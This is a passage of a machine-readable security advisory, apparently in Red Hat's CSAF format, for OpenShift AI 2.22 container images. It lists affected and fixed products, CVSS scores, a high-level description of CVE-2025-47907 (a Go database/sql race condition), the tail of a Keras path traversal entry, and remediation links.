"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Keras Path Traversal Vulnerability"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat enforces the principle of least functionality, ensuring that only essential features, services, and ports are enabled. The environment leverages malicious code protections such as IPS/IDS and antimalware solutions that detect and respond to indicators in real time, limiting the impact of exploitation attempts. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks. In the case of successful exploitation, detection and containment controls are in place to limit impacts by alerting on anomalous system behavior in real time, while process isolation and automated orchestration via Kubernetes minimize the likelihood of concurrent execution scenarios that would trigger the race condition and help contain the impact to a single process.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
